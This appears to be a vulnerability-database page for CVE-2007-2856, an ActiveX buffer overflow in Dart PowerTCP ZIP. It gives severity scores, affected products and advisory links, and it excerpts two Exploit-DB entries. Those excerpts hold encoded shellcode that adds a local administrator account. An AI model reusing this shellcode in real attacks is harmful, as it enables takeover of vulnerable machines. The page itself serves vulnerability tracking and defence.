CVE-2007-2856
published 2007-05-24CVE-2007-2856: Buffer overflow in the Dart Communications PowerTCP ZIP Compression ActiveX control in DartZip.dll 1.8.5.3, when Internet Explorer 6 is used, allows…
PriorityP338critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
7.17%
93.5th percentile
Buffer overflow in the Dart Communications PowerTCP ZIP Compression ActiveX control in DartZip.dll 1.8.5.3, when Internet Explorer 6 is used, allows user-assisted remote attackers to execute arbitrary code via a long first argument to the QuickZip function, a related issue to CVE-2007-2855.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| dart | dart_ziplite_compression | — | — |
| dart | powertcp_zip_compression | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-6qvq-hqc7-q3cj: Buffer overflow in the Dart Communications PowerTCP ZIP Compression ActiveX control in DartZip
ghsa_unreviewed·2022-05-01·CVSS 9.3
CVE-2007-2856 [CRITICAL] CWE-119 GHSA-6qvq-hqc7-q3cj: Buffer overflow in the Dart Communications PowerTCP ZIP Compression ActiveX control in DartZip
Buffer overflow in the Dart Communications PowerTCP ZIP Compression ActiveX control in DartZip.dll 1.8.5.3, when Internet Explorer 6 is used, allows user-assisted remote attackers to execute arbitrary code via a long first argument to the QuickZip function, a related issue to CVE-2007-2855.
GHSA
GHSA-2wj8-f7pq-vfpf: Buffer overflow in a certain ActiveX control in DartZipLite
ghsa_unreviewed·2022-05-01·CVSS 9.3
CVE-2007-2855 [CRITICAL] CWE-119 GHSA-2wj8-f7pq-vfpf: Buffer overflow in a certain ActiveX control in DartZipLite
Buffer overflow in a certain ActiveX control in DartZipLite.dll 1.8.5.3 in Dart ZipLite Compression for ActiveX allows user-assisted remote attackers to execute arbitrary code via a long first argument to the QuickZip function, a related issue to CVE-2007-2856.
No detection rules found.
Exploit-DB
Dart Communications PowerTCP - ZIP Compression Remote Buffer Overflow
exploitdb·2007-05-25
CVE-2007-2856 Dart Communications PowerTCP - ZIP Compression Remote Buffer Overflow
Dart Communications PowerTCP - ZIP Compression Remote Buffer Overflow
---
'metasploit one, add a user 'sun' with pass 'tzu'
shellcode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%54%42%30%42%30%42%30%4b%58%45%44%4e%43%4b%38%4e%57%45%50%4a%37%41%50%4f%4e%4b%48%4f%44%4a%51%4b%48%4f%45%42%42%41%50%4b%4e%49%34%4b%48%46%43%4b%38%41%30%50%4e%41%43%42%4c%49%49%4e%4a%46%58%42%4c%46%57%47%50%41%4c%4c%4c%4d%50%41%30%44%4c%4b%4e%46%4f%4b%33%46%35%46%42%46%50%45%47%45%4e%4b%58%4f%35%46%32%41%30%4b%4e%48%56%4b%48%4e%50%4b%54%4b%38%4f%35%4e%41%41%50%4b%4e%4b%38%4e%51%4b%38%41%30%4b%4e%49%38%4e%45%46
Exploit-DB
Dart Communications PowerTCP - Service Control Remote Buffer Overflow
exploitdb·2007-05-24
CVE-2007-2856 Dart Communications PowerTCP - Service Control Remote Buffer Overflow
Dart Communications PowerTCP - Service Control Remote Buffer Overflow
---
'metasploit one, 456 bytes - cmd /c net user su tzu /add & net localgroup Administrators su /add
shellcode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49%37%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%44%58%50%30%41%30%41%6b%41%41%54%42%41%32%41%41%32%42%41%30%42%41%58%38%41%42%50%75%68%69%39%6c%38%68%31%54%43%30%47%70%57%70%4c%4b%30%45%77%4c%6e%6b%31%6c%47%75%51%68%43%31%48%6f%6c%4b%52%6f%75%48%4c%4b%63%6f%31%30%53%31%38%6b%71%59%6c%4b%36%54%6c%4b%47%71%48%6e%64%71%4f%30%4d%49%6c%6c%4e%64%4b%70%30%74%76%67%4a%61%39%5a%76%6d%55%51%6b%72%4a%4b%68%74%47%4b%70%54%35%74%55%54%61%65%6b%55%6c%4b%41%4f%77%54%34%41%48%6b%71%76%6e%6b%46%6c%62%6b%6e%6b%33%6f%77%6c%54%41%68%6b%6e%6b%57%6c%6c%4b%46%61%48%6b%4f%79
No writeups or analysis indexed.
http://osvdb.org/38111http://retrogod.altervista.org/ie_DartZip_bof.htmlhttp://www.securityfocus.com/archive/1/469503/100/0/threadedhttp://www.securityfocus.com/archive/1/469592/100/0/threadedhttp://www.securityfocus.com/bid/24142http://www.securityfocus.com/bid/24163https://exchange.xforce.ibmcloud.com/vulnerabilities/34494https://exchange.xforce.ibmcloud.com/vulnerabilities/34520http://osvdb.org/38111http://retrogod.altervista.org/ie_DartZip_bof.htmlhttp://www.securityfocus.com/archive/1/469503/100/0/threadedhttp://www.securityfocus.com/archive/1/469592/100/0/threadedhttp://www.securityfocus.com/bid/24142http://www.securityfocus.com/bid/24163https://exchange.xforce.ibmcloud.com/vulnerabilities/34494https://exchange.xforce.ibmcloud.com/vulnerabilities/34520
2007-05-24
Published